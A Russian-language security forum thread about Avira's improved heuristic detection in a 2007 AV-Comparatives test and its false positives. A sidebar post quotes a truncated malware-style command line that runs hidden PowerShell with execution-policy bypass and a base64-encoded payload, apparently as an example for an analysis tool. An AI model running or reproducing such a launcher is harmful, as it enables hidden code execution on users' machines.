Перейти к содержанию
Mag3d

Интересный вопрос: по качеству эвристика от AVIRA

Recommended Posts

Mag3d

Посмотрел сравнительный тест от Клементи за май 2007 года:

http://www.av-comparatives.org/seiten/ergebnisse_2007_05.php

Интересная штука: антивирус от AVIRA раньше ни когда не блестал (я имею введу тест прошлогодний), а тут раз - и в дамки.

В чем прикол: они что-то новое изобрели?

У них какой-то оригинальный эвристик?

Ни кто не видел статей по этому поводу?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
NickXists

-> Mag3d

смотрите, к примеру:

(1) AHeAD...:

http://www.avira.com/en/security_news/anti...protection.html

http://www.avira.com/en/search/index.html?q=AHeAD

(2)...и некоторые ее конечности:

HEUR/Malware - Heuristic:

http://www.avira.com/en/threats/section/fu...ur_malware.html

HEUR/Crypted - Heuristic:

http://www.avira.com/en/threats/section/fu...ur_crypted.html

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Сергей Ильин

По общему детекту в тестах они подрасли, это факт. Но какой целой ... фалсов теперь немерено.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Ego1st

да и было немеренно, на моем компе с эвристиком на максимуме.. я глючил очень долгое время, пока не добавил почти пол системы в исключения..

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
mais

HEUR/Crypted это :lol:

эта антивирусная поделка не вызывает у меня никакого уважения

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
NickXists
HEUR/Crypted это :lol:

эта антивирусная поделка не вызывает у меня никакого уважения

спокойно : ), без фанатизма

любить ее, может, и непросто, но ненавидеть-то за шо. : )

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Dmitry Perets
По общему детекту в тестах они подрасли, это факт.

Угу, причём если смотреть по тестам Клементи, то подросли не только за счёт эвристики с её фолсами, но и за счёт сигнатур. Т.е. в целом продукт совсем неплохой. Среди бесплатных так точно из лучших имхо. Но с этими TRCrypted надо что-то делать, конечно =)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

  • Сообщения

    • PR55.RP55
      Допустим: '%WINDIR%\syswow64\cmd.exe' /c powershell -nop -exec bypass -win Hidden -noni -enc aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYg... '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "%WINDIR%\syswow64\windowspowersh... Было бы неплохо, если бы в Инфо. объекта. Прописывались данные по настройке  разрешений Firewall. + Отдельная категория по Firewall - что разрешено, что заблокировано.
    • SQx
    • SQx
      Спасибо,  как раз появился новый случай.
        DhcpDomain REG_SZ domain.name DhcpNameServer REG_SZ 192.168.1.1  
    • demkd
      ---------------------------------------------------------
       4.11.9
      ---------------------------------------------------------
       o Твик #39 теперь дополнительно включает отслеживание командных строк завершенных процессов, командные строки отображаются в окне информации.
         Только для Windows 8.1/Windows Server 2012 R2 и старше.  o WLBSCTRL.DLL теперь автоматически получает статус подозрительного файла.  o В окне информации сетевого адаптера (в разделе DNS) теперь отображается поле DHCP Domain при его наличии.  
    • PR55.RP55
      https://habr.com/ru/post/214953/ На подобное событие антивирус также может реагировать - если сервер будет в чёрном списке. Да и уязвимости...  
×